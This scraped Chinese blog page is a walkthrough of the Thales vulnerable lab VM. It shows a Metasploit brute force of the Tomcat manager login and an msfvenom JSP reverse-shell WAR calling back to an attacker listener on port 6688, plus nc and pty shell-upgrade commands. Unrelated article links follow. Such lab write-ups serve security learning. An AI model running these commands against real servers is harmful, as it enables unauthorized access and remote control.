当前位置: 首页 > news >正文

Thales靶机

news 2025/8/4 6:02:04

导入vb,设置桥接

打开kali,扫描主机           172.16.2.7

17

扫描一下服务

看一下8080端口tomcat

尝试爆破

msfconsole

search login tomcat

use 0          这里的0是上面扫描login出来的序号,扫出来多少填多少

set rhost 172.16.2.7

run

得出账号密码tomcat   role1

在应用程序列表中我们可以进行文件上传和服务部署,因此构造一个反弹shell进行部署,生成反弹shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.2.63 LPORT=6688 -f war -o upfine.war

输入后将生成upfine.war文件

kali开启监听

nc -lvvp 6688

然后将upfine.war文件进行上传部署并点击upfine进行访问,成功获得shell权限

python3 -c 'import pty;pty.spawn("/bin/bash")'   升级下shell窗口。

http://www.dtcms.com/a/306006.html

相关文章:

  • 《Vuejs设计与实现》第 12 章(组件实现原理 下)
  • 非凸科技受邀出席第九届AIFOF投资创新发展论坛
  • 前端安全防护:XSS、CSRF与SQL注入漏洞深度解析与防御
  • 亚马逊云科技:赋能企业数字化转型,解决实际发展难题
  • 【Axure高保真原型】轮播条形图
  • 让科技之光,温暖银龄岁月——智绅科技“智慧养老进社区”星城国际站温情纪实
  • 【HarmonyOS】鸿蒙应用HTTPDNS 服务集成详解
  • 【Lua】元表常用属性
  • 【MySQL】MySQL索引—B树/B+树
  • 【选型】HK32L088 与 STM32F0/L0 系列 MCU 参数对比与选型建议(ST 原厂 vs 国产芯片)
  • 【LINUX网络】使用TCP简易通信
  • STM32 外部中断 和 定时器中断
  • 使用QT/C++完成的斗地主
  • ECharts从入门到精通:解锁数据可视化的魔法世界
  • 洛谷 P11230:[CSP-J 2024 T4] 接龙 ← 图论+动态规划
  • mac升级安装python3
  • MongoDB系列教程-第三章:PyMongo操作MongoDB数据库(1)—— 连接、基本CRUD操作
  • 代码随想录day50图论1
  • 代码随想录算法训练营第五十五天|图论part5
  • 【CF】Day115——杂题 (构造 | 区间DP | 思维 + 贪心 | 图论 + 博弈论 | 构造 + 位运算 | 贪心 + 构造 | 计数DP)
  • Python 程序设计讲义(43):组合数据类型——元组类型:元组的常用操作
  • KONG API Gateway中的核心概念
  • List 接口
  • 逻辑回归:从线性回归到分类决策的演化
  • Spark大数据分与实践笔记(第五章 HBase分布式数据库-04)
  • Java学习------Object类
  • Qt 与物联网(IoT)开发
  • (补题)小塔的饭
  • 算法-CodeTop(三)
  • PyTorch生成式人工智能(21)——归一化流模型(Normalizing Flow Model)